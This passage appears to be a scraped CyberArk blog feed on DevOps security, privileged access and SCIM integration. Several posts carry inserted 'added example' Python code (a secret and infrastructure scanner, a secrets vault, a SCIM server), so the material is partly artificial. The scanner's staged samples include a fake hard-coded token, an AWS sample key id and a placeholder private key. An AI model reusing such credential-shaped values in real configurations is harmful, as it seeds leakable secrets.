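# whatever infrastructure definition language the team checks in.
IAC_RULES = {
    "ssh_or_rdp_open_to_world": lambda r: r.get("type") == "security_group_rule"
    and r.get("cidr") == "0.0.0.0/0" and r.get("port") in (22, 3389),
    "public_storage_bucket": lambda r: r.get("type") == "storage_bucket"
    and r.get("public_read") is True,
    "privileged_container": lambda r: r.get("type") == "container"
    and r.get("privileged") is True,
}

def scan_iac(path, text):
    """Return (path, resource_name, rule) for each resource that breaks a rule."""
    findings = []
    for resource in json.loads(text):
        for rule, violates in IAC_RULES.items():
            if violates(resource):
                findings.append((path, resource.get("name", "<unnamed>"), rule))
    return findings

def run_check_in_gate(files):
    """Scan every staged file: .json as infrastructure, everything else for secrets."""
    findings = []
    for path, text in files.items():
        scanner = scan_iac if path.endswith(".json") else scan_for_credentials
        findings.extend(scanner(path, text))
    return findings

def gate_passes(files):
    return not run_check_in_gate(files)

# Constructed sample files, as a developer might stage them for check-in.
SAMPLE_FILES = {
    "app/config.py": (
        'DB_HOST = "db.internal.example"\n'
        'DB_PASSWORD = "${DB_PASSWORD}"  # injected at runtime: not flagged\n'
        'API_TOKEN = "x7Gq9sLp2vRt4wZk8mNb"  # hard-coded: flagged\n'
        'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"  # AWS documentation sample id\n'
    ),
    "deploy/keys.txt": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "(constructed placeholder, not real key material)\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
    "deploy/infra.json": json.dumps([
        {"type": "security_group_rule", "name": "allow-ssh-anywhere", "port": 22, "cidr": "0.0.0.0/0"},
        {"type": "security_group_rule", "name": "allow-https", "port": 443, "cidr": "0.0.0.0/0"},
        {"type": "storage_bucket", "name": "build-artifacts", "public_read": False},
        {"type": "container", "name": "ci-runner", "privileged": True},
    ]),
}

if __name__ == "__main__":
    for finding in run_check_in_gate(SAMPLE_FILES):
        print("BLOCK", *finding)
    print("gate passes:", gate_passes(SAMPLE_FILES))
```

The placeholder and entropy filters are what keep such a gate from becoming the "stop sign" the article warns about: `${DB_PASSWORD}` injected at deploy time and a dummy value like `changeme` pass, while a random-looking token or a cloud access key id blocks the check-in with the file and line the developer needs to fix.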

Security education is critical in bridging the security-development gap, but remember, education is a two-way street. Security professionals should take the time to learn about DevOps tools and their unique security profiles. For example, some tools require hard-coded credentials with privileged accounts. Instead of simply shutting them down, find temporary solutions via isolation to maintain velocity. Security teams should actively contribute to new DevOps tool-chain research to collaboratively find solutions that can provide both speed and security.

Bottom line: As a security professional, the best way to embed yourself fully in the DevOps process is to take on a trusted service provider role, encouraging teams to engage with you regularly to review designs, tooling and emerging threats. Be a team player, and it won’t be long before your insights are not only recognized but also actively sought out.

Interested in learning more? Explore these insights from Global 1000 CISOs on ways to bring security teams into closer alignment with DevOps to drive collaboration and fast-track efforts.

Puppet’s ‘2018 State of DevOps Report’ Highlights Increasing Importance of Security as DevOps Evolves https://www.cyberark.com/blog/puppets-2018-state-of-devops-report-highlights-increasing-importance-of-security-as-devops-evolves/ Thu, 20 Sep 2018 13:01:22 +0000 https://www.cyberark.com/?p=28923

If you are interested in understanding more about how DevOps evolves inside organizations and how security aligns with the evolution of DevOps maturity, Puppet’s 2018 State of DevOps Report offers some powerful insights. The report draws on survey results over multiple years from some 30,000 technical professionals across the globe, as well as insights from DevOps pioneers, including Gene Kim.

One key finding, for example, notes that automating security policy configurations is mission-critical to reaching the highest levels of DevOps evolution. This means as organizations evolve, security policy becomes part of operations, not just an afterthought when an audit looms. Organizations must break down the boundaries between ops and security teams.

The report extends beyond technology – it also probes culture, process and other factors driving IT performance. While DevOps adoption is increasing at a rapid pace, there are many paths for organizations to take for a successful DevOps journey. Unfortunately, there are even more that can lead to failure.

Some of the most successful DevOps projects come from the ground up vs. top down from a corporate directive. This potentially presents challenges for security teams with a top-down approach. If DevOps originates broadly across the organization from multiple sources, the security team may only gain visibility after the DevOps initiatives have already become established within the business. While it’s obviously much better for security to be involved early in the process to guide and establish security policies for the DevOps team to execute on, when DevOps initiatives come from the ground up it becomes significantly more difficult.

The State of DevOps report views the three pillars of DevOps as culture, automation and measurement. It also identifies and examines the characteristics of DevOps teams and approaches across five distinct stages of evolution, from Stage 0, “Build the Foundation” to Stage 5, “Provide Self-Service Capabilities.” These phases highlight the increasing role and awareness of security, and how security is becoming more widely considered and incorporated at earlier stages of the DevOps evolution.

As noted earlier, a key highlight of the report is how “Automating security policy configurations is mission-critical to reaching the highest levels of DevOps evolution.” To quote from the report summary:

“Highly evolved organizations are 24 times more likely to always automate security policy configurations compared to the least evolved organizations. As organizations evolve, security policy becomes part of operations, not just an afterthought when an audit looms. This requires first breaking down boundaries between ops and security teams (which are further from production). As we see with all the fundamental practices of DevOps, this practice evolves from resolving immediate pain to a more strategic focus — in this case, from “keep the auditors off my back” to “keep the business and our customers’ data secure.” In other words, teams automate security policy configurations initially for their own benefit, and as their understanding evolves, the automation evolves to benefit the entire organization.”

Security is also increasingly recognized at the earlier stages of DevOps evolution. For example at Stage 2, which focuses on achieving standardization and reducing variability, one of the benefits is to reduce the attack surface and security vulnerabilities. This recognition is positive news. As a result, DevOps teams should become increasingly receptive to the security team getting involved and asking how they can help.

Along with AWS, Cognizant and others, CyberArk is a co-sponsor of the 7th annual State of DevOps Report, presented by Puppet and Splunk.

Interested in learning more?

Ten Steps for Securing Privileged Access https://www.cyberark.com/blog/ten-steps-for-securing-privileged-access/ Tue, 18 Sep 2018 13:48:29 +0000 https://www.cyberark.com/?p=28893

In today’s digital world, privileged accounts, credentials and secrets are everywhere—on-premises, in the cloud, on endpoints and across DevOps environments. Security breaches of sensitive data ranging from customer records to intellectual property frequently involve the use of stolen privileged credentials.

Our recently launched “Privileged Access Security for Dummies” eBook educates organizations on how to tighten privileged access security to reduce risk from attackers and malicious insiders. One particularly popular chapter highlights 10 practical steps for reducing privileged access risk. Here is an at-a-glance look at these recommendations. For full details and tips on prioritizing steps to efficiently drive down risk, download a free copy of the eBook today.

  1. Eliminate irreversible network takeover attacks. Don’t let attackers ruin your network and create long-term damage by gaining access to your domain controllers. Move privileged credentials associated with all Tier 0 and Tier 1 assets—such as domain controller accounts—to a centralized and automated system. Implement multi-factor authentication (MFA) to protect it.
  2. Control and secure infrastructure accounts. You must control and secure access to your on-premises and cloud infrastructure accounts—from server admin accounts to database instance accounts—because these are some of the riskiest keys to your IT kingdom. Vault all well-known infrastructure accounts and automatically rotate passwords periodically after every use.
  3. Limit lateral movement. Attackers follow patterns – stealing credentials and moving laterally across the infrastructure to carry out their goals. To limit attackers’ movement, remove local admin rights on IT Windows workstations to stop credential theft.
  4. Protect credentials for third-party applications. Attackers increasingly target third-party vendors such as business services, management consultants, legal counsel, facilities maintenance support, logistics companies and more as their applications and IT systems are often less sophisticated and their security defenses are easier to infiltrate. To minimize risk, it’s important to vault all privileged credentials used by third-party applications and vendors. Be sure credentials are rotated frequently.
  5. Manage *NIX SSH keys. SSH keys are gold to an external attacker or malicious insider, as they can leverage unmanaged SSH keys to log in with root access and take over the *NIX (Linux and Unix systems) technology stack. Get these keys in a vault ASAP. After vaulting, make sure to routinely rotate them based on policy and employ a solution that enables event notifications and automation to lessen the potential impact of human error.
  6. Defend DevOps secrets in the cloud and on-premises. DevOps teams have the “need for speed.” Make sure their tools and coding methods don’t compromise privilege access security. Vault and automatically rotate all public cloud privileged accounts, keys and API keys. Additionally, secure secrets used by CI/CD tools such as Ansible, Jenkins and Docker in a vault, while allowing them to be retrieved on the fly, automatically rotated and managed.
  7. Secure SaaS admins and privileged business users. Cyber criminals steal credentials used by SaaS administrators and privileged business users to get high-level and stealthy access to sensitive systems. To prevent this kind of attack, isolate all access to shared IDs and require MFA. Also monitor and record sessions of SaaS admins and privileged business users.
  8. Invest in periodic Red Team exercises to test defenses. In order to stay a step ahead of advanced cyber maneuvers, it’s critical to adopt an attacker’s mindset. When you hire and operate your own Red Team or hire an outside firm, the drills will be as real as possible. Check out this Q&A with our Head of Red Team Services for tips.
  9. Invest in a tool to periodically measure reduction in privileged security risk. Measurement of risk and maturity is a critical capability. If you aren’t gauging and adjusting for risk and change, you can’t focus and know if you’ve done enough. Measurement tools may be available from your privileged access management solution. There are also solutions in the market available to measure your entire security program against an established framework (such as NIST CSF).
  10. Utilize MFA. Passwords are crackable, findable and sharable. MFA that requires “something you have” and “something you know” exponentially decreases compromise. It’s important to ensure your privileged access management solution heavily leverages MFA to enhance the protection that you’re investing in.

Together, these 10 steps provide a framework to establish essential privileged access security controls to strengthen your security posture. Implementing a program that leverages these steps can help your organization achieve greater risk reduction in less time and satisfy security and regulatory objectives with fewer internal resources. Read more details in our “Privileged Access Security for Dummies” eBook.

Securing Enterprise DevOps Environments with CyberArk Conjur: 3 Common Use Cases https://www.cyberark.com/blog/securing-enterprise-devops-environments-with-cyberark-conjur-3-common-use-cases/ Tue, 11 Sep 2018 14:34:10 +0000 https://www.cyberark.com/?p=28780

Enterprises adopt DevOps and CI/CD methodologies to accelerate the pace of innovation, eliminate inefficiencies and reduce costs. While this is a giant step forward for businesses, it often introduces complex authentication, authorization and auditing challenges for security teams. Securing credentials and secrets in dynamic DevOps and cloud-based infrastructure requires solutions that are able to support these highly automated dynamic environments by authenticating and managing machine-based identities. Additionally, IT operations and security want to leverage the security policies they have already established across the enterprise, to consistently enforce access policies and avoid disjointed or stand-alone approaches which hamper the pace of development and create additional risk.

DevOps requires a new, centralized approach to secrets management and access control that removes credentials and secrets (i.e. passwords, SSH keys and API keys) from applications and source code control systems, unifies reporting and administration, eliminates friction and fosters programmability and automation.

CyberArk Conjur Enterprise, part of the CyberArk Privileged Access Security Solution, is an enterprise-proven secrets management solution, tailored specifically to the unique infrastructure requirements of native cloud, containerized applications and DevOps environments. The solution helps organizations to secure and manage secrets used by machines and users throughout the DevOps pipeline. With Conjur Enterprise, developers can easily protect secrets, keys, certificates and authentication data. All can be stored more securely—out of repositories, out of source code and off of developer’s laptops —for powerful protection, control and manageability.

While Conjur can be used to apply security controls and best practices anywhere in cloud automation and the continuous software delivery pipeline, here are three common use cases:

  1. Securing the Continuous Integration and Delivery Pipeline. Many enterprises use automated configuration management tools to enable continuous integration and delivery (CI/CD) practices. However, these solutions are inherently difficult to secure because they comprise multiple tools, often each with some varying form of secrets management capability. This leads to “security islands” that make it difficult to securely share secrets and institute uniform security policies. Additionally, secrets and credentials used to authenticate exchanges and encrypt transactions can be scattered across multiple tools, physical and virtual machines, as well as coded into playbooks, making them effectively impossible to track and manage. CyberArk Conjur integrates natively with leading automated configuration management tools, helping enterprises centralize and simplify the management of security credentials across the application lifecycle. By centrally managing machine identity and role-based access controls for CI/CD configuration management solutions, IT organizations can streamline operations and improve compliance, while instituting uniform security policies across the pipeline.
  2. Strong Container Authentication. In a given enterprise, a few VMs can easily give way to hundreds or many thousands of containers—each with its own security attributes. Adding to this IT security nightmare, containers are by nature transient—spun up and down to support continuous delivery—making them extremely difficult to track and manage. CyberArk Conjur is specifically architected for containerized environments. The solution leverages the native capabilities of the leading container platforms, including Kubernetes, OpenShift and Pivotal Cloud Foundry with seamless integrations to provide robust authentication and authorization. These native integrations enable IT organizations to centralize and simplify the management of secrets for containers across their cloud and hybrid environments. With Conjur, each container/pod is assigned a unique set of role-based access privileges for fine-grained control. Applications and services running in containers are uniquely authenticated, ensuring secrets are shared securely and only with their intended recipients. Credentials are managed based on policy and central audit trails provide visibility into critical security events.
  3. Secure Application Autoscaling. Leading cloud providers, such as AWS, offer auto-scaling capabilities to support elasticity and pay-as-you-grow economics. Yet the dynamic nature of auto-scaling creates numerous security management challenges for enterprises. CyberArk Conjur integrates with leading public cloud services, helping enterprises centralize, simplify and automate the onboarding of secrets and other credentials in auto-scaling environments. For example, Conjur host authentication capabilities enable the distribution of secrets to new cloud compute instances as they are instantiated. Automated rotators make it easy to periodically or proactively update the access keys. Organizations can also use the free CyberArk DNA tool to scan a cloud service, such as AWS, and automatically discover EC2 instances, IAM users and access keys to identify vulnerabilities and assess risks.
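The three use cases share a small set of properties: a machine identity that authenticates to a central store, a policy that grants that identity only the secrets it needs, rotation that does not break workloads still holding the previous value, and an audit trail of every decision. The Python below is an added example written for this post to make those properties concrete; it is not Conjur code and does not use the Conjur API. The identities, secret names, grace period and clock values are constructed, and the store is in-memory only.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class SecretVersion:
    value: str
    version: int
    created_at: float                   # clock value supplied by the caller
    expires_at: Optional[float] = None  # set once a newer version supersedes it


class SecretsStore:
    """In-memory stand-in for a central vault (constructed for this example)."""

    def __init__(self, grace_seconds=60):
        self.grace = grace_seconds
        self.api_key_hashes = {}  # identity -> sha256 hex of its API key
        self.policy = {}          # identity -> set of secret ids it may read
        self.versions = {}        # secret id -> [SecretVersion], oldest first
        self.audit = []           # append-only trail of every decision

    def register_identity(self, identity, allowed_secrets):
        """Enroll a machine identity; the API key is returned once and kept hashed."""
        api_key = secrets.token_urlsafe(32)
        self.api_key_hashes[identity] = hashlib.sha256(api_key.encode()).hexdigest()
        self.policy[identity] = set(allowed_secrets)
        return api_key

    def authenticate(self, identity, api_key):
        expected = self.api_key_hashes.get(identity)
        presented = hashlib.sha256(api_key.encode()).hexdigest()
        ok = expected is not None and hmac.compare_digest(presented, expected)
        self.audit.append(("authn", identity, ok))
        return ok

    def rotate(self, secret_id, new_value, now):
        """Store a new version; older versions stay valid only for the grace period."""
        history = self.versions.setdefault(secret_id, [])
        for old in history:
            if old.expires_at is None:
                old.expires_at = now + self.grace
        history.append(SecretVersion(new_value, len(history) + 1, now))
        self.audit.append(("rotate", secret_id, len(history)))

    def fetch(self, identity, api_key, secret_id):
        """Hand out the current value only to an authenticated, authorised identity."""
        if not self.authenticate(identity, api_key):
            raise PermissionError("authentication failed")
        if secret_id not in self.policy.get(identity, set()):
            self.audit.append(("deny", identity, secret_id))
            raise PermissionError("not permitted by policy")
        current = self.versions[secret_id][-1]
        self.audit.append(("fetch", identity, secret_id, current.version))
        return current.value

    def accepts(self, secret_id, presented, now):
        """What a target system checks: the current value, or a superseded one still in grace."""
        for candidate in self.versions.get(secret_id, []):
            in_grace = candidate.expires_at is None or now < candidate.expires_at
            if in_grace and hmac.compare_digest(candidate.value, presented):
                return True
        return False


def demo():
    """Walk a CI runner through enrolment, retrieval, rotation and a denied request."""
    store = SecretsStore(grace_seconds=60)
    runner_key = store.register_identity("ci/jenkins-runner", ["db/app-password"])
    store.rotate("db/app-password", "pw-v1-constructed", now=0)
    first = store.fetch("ci/jenkins-runner", runner_key, "db/app-password")
    store.rotate("db/app-password", "pw-v2-constructed", now=100)  # scheduled rotation
    second = store.fetch("ci/jenkins-runner", runner_key, "db/app-password")
    try:
        store.fetch("ci/jenkins-runner", runner_key, "aws/root-access-key")
        denied = False
    except PermissionError:
        denied = True
    return {
        "first": first, "second": second, "denied": denied,
        "old_still_in_grace": store.accepts("db/app-password", "pw-v1-constructed", now=120),
        "old_after_grace": store.accepts("db/app-password", "pw-v1-constructed", now=200),
        "audit_events": len(store.audit),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The grace window is the detail that makes automated rotation safe for the autoscaling case: an instance that fetched the old value a moment before rotation keeps working until the window closes, while anything presenting the old value afterwards is refused and the refusal is visible in the trail.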

For more information on the capabilities and architecture of this powerful secrets management solution, download our white paper and also try Conjur Open Source. To learn more about effectively accelerating the pace of innovation while enabling DevOps security at scale, explore these six guiding principles.

Lifelong Learning is Beneficial for You and the Cyber Security Industry https://www.cyberark.com/blog/lifelong-learning-is-beneficial-for-you-and-the-cyber-security-industry/ Fri, 31 Aug 2018 13:10:23 +0000 https://www.cyberark.com/?p=26992

As the summer days dwindle, I’m sure many of us have a few common observations. For example, my commute to work has been great this week – clearly everyone wants to squeeze in well-deserved vacation time before Labor Day. The number of automatic email replies pinging my inbox supports this observation. Lastly, my Facebook feed is filled with first day of school pictures. This year, I’m also starting to see pictures parents post as they leave their kids in a college dorm for the first time – yikes!

As I flip through the feed, my mind drifts between nostalgic memories of preparing for the first day of school to the pragmatic realities of living a modern life. We are all still learning and toting around backpacks with laptops that kill our posture.

Consider what some of history’s greatest contributors have observed about learning:

  • “Anyone who stops learning is old, whether at twenty or eighty. Anyone who keeps learning stays young.”
    Henry Ford
  • “Find something you’re passionate about and keep tremendously interested in it.”
    Julia Child
  • “Intellectual growth should commence at birth and cease only at death.”
    Albert Einstein
  • “Tell me and I forget. Teach me and I remember. Involve me and I learn.”
    Benjamin Franklin
  • “The noblest pleasure is the joy of understanding.”
    Leonardo da Vinci

Though these timeless quotes can be applied to all walks of life, they seem particularly relevant for today’s cyber security professionals. With a career in which the only constant is change, cyber security professionals must continuously find new ways to hone their skills and stay ahead of unrelenting threats to their organization.

According to HBR, “Some characteristics of a successful cyber security professional simply can’t be taught in a classroom: unbridled curiosity, passion for problem solving, strong ethics and an understanding of risks.” Keep this in mind as your colleagues ask questions and seek mentors. Be willing to teach and to learn.

If you believe the memes on social media, then you already know business and other successful leaders allocate at least five hours a week for learning. Reading is fundamental, so they say. Hopefully, you were able to knock off one or two of the books on your reading list this summer. If it’s a quick read you seek, check out our free Privileged Access Security for Dummies eBook—it’s full of actionable tips, technical insight and lessons others have learned.

If you prefer more structured learning, consider taking advantage of virtual or face-to-face training courses.

For other ways to up your cyber security IQ, check out our full collection of curated resources—from on-demand webinars and videos to infographics and technical white papers. And if it’s a new environment you seek for growth, we are hiring! Visit our careers page, explore open positions and get in touch.

Say “Oui” to the CyberArk Privileged Access Security Solution Version 10.5 – Danke! https://www.cyberark.com/blog/say-oui-to-the-cyberark-privileged-access-security-solution-version-10-5-danke/ Wed, 29 Aug 2018 13:23:38 +0000 https://www.cyberark.com/?p=26973

With the release of the CyberArk Privileged Access Security Solution Version 10.5, organizations can further simplify and increase the efficiency of privileged access security program operations while maintaining the highest level of security standards. Version 10.5 is centered on CyberArk’s core mission to streamline processes and simplify the overall ease-of-use of our solution, as well as improve security and reduce risk.

Expanding Online Support in New Languages

Learning a new language is hard, and translating industry-specific terms that aren’t common in everyday speech is even harder. That’s why CyberArk has added support for 10 new languages within the new user interface: French, Spanish, Portuguese, German, Russian, Chinese, Korean, Japanese, Polish and Turkish, making it easier for end users to more effectively navigate CyberArk in their own native tongue. The CyberArk solution also enables the use of searchable terms to help users quickly discover and execute what they need by selecting terms such as: security, end-user, administration, developer and installation.

Efficient Workflows

Version 10.5 introduces several new features that facilitate workflows for IT administrators. When creating onboarding rules, administrators can now edit preexisting rules whenever they want to create a new policy. This new capability streamlines the backend onboarding rule processes, saves time and removes friction for vault admins.

Being able to utilize native controls can also be a sticking point, as every administrator likes to do their job without being redirected through alternative tools. Organizations that have enabled CyberArk Privileged Session Manager can now fully automate the deployment of connectors without the need for manual intervention. It’s easy via the integration of your own GUI clients into Privileged Session Manager. This not only shortens deployment time, but also reduces human errors by automating this process.

Detection & Mitigation

It’s not uncommon for some end-users to skirt around security steps in the name of ease; it’s simply human nature. To counteract this, many organizations will block RDP client connections from end-user machines and block the ability to open port 3389 for the RDP protocol in the corporate firewall, following security best practices. With Version 10.5, auditors and security teams can now monitor, suspend or terminate privileged sessions through HTML5 gateways, which eliminates the requirement to open an RDP connection from the end-user machine.

In this new version, CyberArk Privileged Threat Analytics has also added the capability to classify vault users, accounts and machines that are allowed to use risky commands and distinguish from those who are forbidden to do so. Not only does this granular configuration allow security teams to reduce the number of false positives, but it also helps administrators to prioritize security events more accurately and efficiently than ever before.

Is Version 10.5 for you?

If you are like so many administrators who want to reduce risk without creating unnecessary barriers for your team, then consider what Version 10.5 could do for you. Existing customers can read the full details in the release notes available in the CyberArk Support Vault. For more information, please visit www.cyberark.com, or request a demonstration here.

The History, Evolution and Opportunity: System for Cross Identity Management (SCIM) Server Technologies https://www.cyberark.com/blog/the-history-evolution-and-opportunity-system-for-cross-identity-management-scim-server-technologies/ Fri, 24 Aug 2018 16:06:13 +0000 https://www.cyberark.com/?p=26949

The History and Evolution

Development on the System for Cross Identity Management (SCIM) specifications has been an ongoing effort with contributions from industry experts across every aspect of security. Originally, SCIM technology was created to extend identity information associated with entities such as users and group membership across disparate systems, unifying a multi-domain environment. Now, this technology is showing potential to become much more standardized, extending support to access management solutions and other tools that require knowledge about “who” (users and applications) has access to “what” (credentials for target systems and devices, in the case of Privileged Access Security solutions).

Without a SCIM standard, every solution provider would have its own set of APIs, making it difficult for each of these different systems to share information with each other using a common “language.” Developing the SCIM specifications enables plug-and-play interoperability among vendors to become a natural capability of the systems involved, which also expands the kind of functionality that can be delivered when this data is harmonized across different systems.

Powered by an application-level HTTP-based protocol, leveraging SCIM enables organizations to create, modify, retrieve and discover core identity resources enabling multiple systems to “speak with each other.” Once enabled, these external systems can communicate without knowing exactly what’s going on with the other system – and they shouldn’t have that level of insight for obvious security reasons. This presents a considerable opportunity to seamlessly integrate security solutions, minimizing the need for professional services engagement or having to work with a vendor’s extensions team.

The Movement Towards SCIM Standardization

The SCIM protocol is expanding – providing support to privileged access security as well as cloud-based services and applications. As mentioned earlier, by leveraging this common standard, vendors can easily share and synchronize identity information to many third-party solutions and start interacting with the data on day one. This opportunity is not limited to vendors in the identity business.

Let’s say an organization is trying to scan a new environment to uncover potentially unknown vulnerabilities. Any industry standard scanner would require access to credentials for accounts with highly privileged permissions in order to perform authenticated scans on various target systems. These scanners would need to obtain said credentials at the exact moment in which they are needed to avoid both compliance and security risks. In theory (and in practice really), a vulnerability scanner can securely retrieve these necessary credentials and be treated as a “user” with rights and permissions to gain access to where the credentials are stored.

By leveraging SCIM, all the entitlements (who has access to what, and what kind of permissions) can flow directly back into any Identity and Access Management solution. With this information, Identity Access Certifications (attestations) and compliance controls can be managed, establishing the necessary permissions for privileged access based on the resulting provisioning/de-provisioning actions. Throughout this process the scanner then becomes just another identity under management – and powered by SCIM, we’ve seamlessly unified IAM, Privileged Access Security and vulnerability scanner solutions.
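The create, modify, retrieve and discover operations described above map onto a small set of HTTP resources and JSON messages defined by the SCIM 2.0 specifications (the core schema in RFC 7643 and the protocol in RFC 7644). The Python below is an added example written for this post, not the CyberArk SCIM server or SailPoint code: it implements the /Users resource logic in memory, including the string-equality filter a governance tool uses to discover an identity and the PatchOp that de-provisions it by setting `active` to false. The user names and group identifiers are constructed.

```python
import json
import re
import uuid

USER_SCHEMA = "urn:ietf:params:scim:schemas:core:2.0:User"
LIST_RESPONSE = "urn:ietf:params:scim:api:messages:2.0:ListResponse"
PATCH_OP = "urn:ietf:params:scim:api:messages:2.0:PatchOp"
ERROR = "urn:ietf:params:scim:api:messages:2.0:Error"

# Attributes a client may change with PATCH. "groups" on a User is read-only in
# SCIM: membership is managed through the Group resource, not by editing users.
MUTABLE = {"userName", "active", "displayName"}


def scim_error(status, scim_type=None, detail=None):
    body = {"schemas": [ERROR], "status": str(status)}
    if scim_type:
        body["scimType"] = scim_type
    if detail:
        body["detail"] = detail
    return status, body


class ScimUsers:
    """Minimal /Users endpoint logic; every method returns (http_status, body)."""

    def __init__(self):
        self._users = {}

    def create(self, body):
        """POST /Users."""
        if USER_SCHEMA not in body.get("schemas", []) or not body.get("userName"):
            return scim_error(400, "invalidValue")
        if any(u["userName"] == body["userName"] for u in self._users.values()):
            return scim_error(409, "uniqueness")
        uid = str(uuid.uuid4())
        user = {
            "schemas": [USER_SCHEMA],
            "id": uid,
            "userName": body["userName"],
            "displayName": body.get("displayName", body["userName"]),
            "active": bool(body.get("active", True)),
            "groups": list(body.get("groups", [])),
            "meta": {"resourceType": "User", "location": f"/Users/{uid}"},
        }
        self._users[uid] = user
        return 201, user

    def get(self, uid):
        """GET /Users/{id}."""
        user = self._users.get(uid)
        return (200, user) if user else scim_error(404, detail="Resource not found")

    def search(self, filter_expr=None):
        """GET /Users?filter=...; only the form  attr eq "value"  is parsed here."""
        matches = list(self._users.values())
        if filter_expr:
            m = re.fullmatch(r'(\w+) eq "([^"]*)"', filter_expr.strip())
            if not m:
                return scim_error(400, "invalidFilter")
            attr, value = m.groups()
            matches = [u for u in matches if u.get(attr) == value]
        return 200, {"schemas": [LIST_RESPONSE], "totalResults": len(matches),
                     "startIndex": 1, "itemsPerPage": len(matches), "Resources": matches}

    def patch(self, uid, body):
        """PATCH /Users/{id}; a replace of active=false is the de-provisioning step."""
        if uid not in self._users:
            return scim_error(404, detail="Resource not found")
        if PATCH_OP not in body.get("schemas", []):
            return scim_error(400, "invalidSyntax")
        user = self._users[uid]
        for op in body.get("Operations", []):
            if op.get("op", "").lower() != "replace":
                return scim_error(400, "invalidValue")  # only replace is implemented
            if op.get("path") not in MUTABLE:
                return scim_error(400, "mutability")
            user[op["path"]] = op["value"]
        return 200, user


def demo_lifecycle():
    """Provision a constructed user, discover it by filter, then de-provision it."""
    server = ScimUsers()
    status, user = server.create({
        "schemas": [USER_SCHEMA], "userName": "bjensen",
        "groups": [{"value": "grp-constructed-1", "display": "Vault Admins"}]})
    dup_status, _ = server.create({"schemas": [USER_SCHEMA], "userName": "bjensen"})
    _, listing = server.search('userName eq "bjensen"')
    patch_status, patched = server.patch(user["id"], {
        "schemas": [PATCH_OP],
        "Operations": [{"op": "replace", "path": "active", "value": False}]})
    bad_status, bad = server.patch(user["id"], {
        "schemas": [PATCH_OP],
        "Operations": [{"op": "replace", "path": "groups", "value": []}]})
    return {"created": status, "duplicate": dup_status, "found": listing["totalResults"],
            "deprovisioned": patch_status == 200 and patched["active"] is False,
            "group_patch": (bad_status, bad["scimType"])}


if __name__ == "__main__":
    print(json.dumps(demo_lifecycle(), indent=2))
```

The rejected group patch is the point worth noticing for a privileged access integration: SCIM lets the governance side read who holds which entitlements and switch an identity off, but membership in privileged groups is changed through the Group resource, so the server can keep that path under its own policy rather than accepting arbitrary edits to a user record.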

Through this evolutionary process, SCIM server technology and its associated specifications being developed will go beyond the identity space, enabling organizations to govern third-party applications access to credentials and beyond. The opportunity presented here has the potential to create an infinite number of tight integrations across the hundreds of security solutions available today. Additionally, it brings more value to existing security investments and more importantly, mitigates risk against today’s most advanced cyber threats.

The CyberArk and SailPoint integration, for example, leverages SCIM server technology. The CyberArk SCIM server is a Java application conforming to the SCIM standard. This allows SailPoint to query and modify Privileged Data (such as Users, Groups, Accounts, Safes, and Permissions) through a web services interface (REST API). The SCIM server uses PACLI (to query and update privileged data from the CyberArk Vault) and the AIM Credential Provider (to retrieve account and login information). Learn more about the CyberArk SailPoint integration on the CyberArk Marketplace and in this on-demand webinar.

The Power of Integrating Privileged Access Security and Identity Governance https://www.cyberark.com/blog/the-power-of-integrating-privileged-access-security-and-identity-governance/ Tue, 21 Aug 2018 14:25:06 +0000 https://www.cyberark.com/?p=26913

Privileged access across the enterprise continues to increase exponentially, and it’s not hard to see why. Interconnectivity, cloud and mobile-first strategies have enabled a distributed enterprise, in which more people work from home, on the go and in different locations. Business users extend outside of the organization to include vendors, contractors and partners – many of whom need privileged access to critical applications and data to perform their required tasks. Every day, countless non-human applications use privileged credentials to connect to sensitive resources across on-premises, cloud and hybrid environments, as well as DevOps processes.

Securing privileged access to an organization’s most sacred assets is critical in today’s modern threat landscape. Knowing “who” and “what” has access is key. Organizations need to certify each and every one of these privileged accounts – as well as verify when these accounts were last certified. Yet when it comes to managing users and their access entitlements, organizations often deploy two separate solutions to manage the identity lifecycle and access policies for privileged and non-privileged users. In fact, in many organizations, security and audit teams rarely talk to one another.

This siloed approach to managing who has access to what does more than leave dangerous security gaps and blind spots; it can also result in:

  • Increased dormant and orphaned privileged accounts: These unused accounts expand the attack surface and are typically “hidden” from normal management and audit.
  • Privileged entitlement creep: Without full visibility, individuals’ access rights often grow beyond what they need to do their current jobs.
  • Erroneous provisioning of privileged access: Without proper policies dictating separation of duties, privileged access can be mistakenly granted to people who do not need or should not have it.
  • Loss of productivity: Without automated privileged access provisioning synchronized to lifecycle events, users are often forced to wait to access systems and data needed to do their jobs. This inconsistent governance, provisioning and authorization process can also result in access violations and regulatory action.

Available on the CyberArk Marketplace, the CyberArk Privileged Access Security Solution and SailPoint Identity Governance provide an integrated, policy-driven approach to – and a unified, single pane of glass view for – managing identity and access governance for all non-privileged and privileged users and environments across the enterprise.

By integrating the CyberArk Privileged Access Security Solution with the SailPoint IdentityIQ Privileged Account Management Module, organizations can close many of the security gaps from historic siloed approaches, while reducing risk and eliminating redundant processes related to managing non-privileged and privileged access. With this joint solution, organizations gain:

  • Critical visibility and governance: Improving security by applying consistent controls and fully managing privileged users and application entitlement lifecycles.
  • Reduced risk: Reducing the attack surface and enhancing regulatory compliance by limiting access privileges and consolidating certifications for privileged and non-privileged accounts to ensure users have the right access to the right safes.
  • Simplified and centralized administration: Improving productivity by streamlining delivery of privileged account access, mitigating entitlement creep via regular de-provisioning and synchronizing and enforcing access controls based on unified security policies to reduce errors.

The CyberArk and SailPoint integration is built on a System for Cross-domain Identity Management (SCIM) server. SCIM is an open standard, which makes the same interface available for integration with other security and technology partners. The CyberArk SCIM server is a Java application conforming to the SCIM standard. It allows an identity governance platform like SailPoint to query and modify privileged data (such as Users, Groups, Accounts, Safes and Permissions) through a web services interface (REST API). The SCIM server uses PACLI (to query and update privileged data in the CyberArk Vault) and the AIM Credential Provider (to retrieve account and login information).
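To make the integration concrete, here is an added example (not CyberArk’s or SailPoint’s code) of what a SCIM 2.0 client does against any standards-conforming SCIM server: it builds a filtered Users lookup with proper quoting of the value (so a crafted user name cannot rewrite the filter into “return every user”), validates the ListResponse envelope before trusting the results, and constructs PatchOp bodies to add or remove a Group member. The base URL, resource ids and sample response are constructed for the example; the CyberArk SCIM server’s own extensions for Safes and Permissions are not modeled.

```python
"""Minimal SCIM 2.0 (RFC 7643/7644) client helpers.

Added example of generic SCIM client behaviour.  Base URL, resource ids and
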